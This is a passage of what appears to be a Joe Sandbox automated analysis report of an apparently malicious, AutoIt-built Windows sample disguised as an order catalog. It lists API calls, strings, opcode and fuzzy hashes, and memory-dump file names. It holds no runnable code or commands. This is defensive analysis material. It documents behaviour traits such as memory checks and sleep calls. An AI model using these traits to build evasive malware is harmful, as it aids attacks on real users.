                                                                                                • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                                                • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000), ref: 00474833
                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                • String ID: @
                                                                                                • API String ID: 2783356886-2766056989
                                                                                                • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                                                • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: htonsinet_addr
                                                                                                • String ID: 255.255.255.255
                                                                                                • API String ID: 3832099526-2422070025
                                                                                                • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                                                • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend_wcslen
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 455545452-1403004172
                                                                                                • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                                                • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: InternetOpen
                                                                                                • String ID: <local>
                                                                                                • API String ID: 2038078732-4266983199
                                                                                                • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                                                • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend_wcslen
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 455545452-1403004172
                                                                                                • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                                                • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend_wcslen
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 455545452-1403004172
                                                                                                • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                                                • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                • wsprintfW.USER32 ref: 004560E9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend_mallocwsprintf
                                                                                                • String ID: %d/%02d/%02d
                                                                                                • API String ID: 1262938277-328681919
                                                                                                • Opcode ID: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                                                                • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                                                • Opcode Fuzzy Hash: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                                                                • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                                                APIs
                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                • String ID: Shell_TrayWnd
                                                                                                • API String ID: 529655941-2988720461
                                                                                                • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                                • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                                APIs
                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                                • PostMessageW.USER32(00000000), ref: 00442247
                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                • String ID: Shell_TrayWnd
                                                                                                • API String ID: 529655941-2988720461
                                                                                                • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                                • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                                APIs
                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                                  • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message_doexit
                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                • API String ID: 1993061046-4017498283
                                                                                                • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                                • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E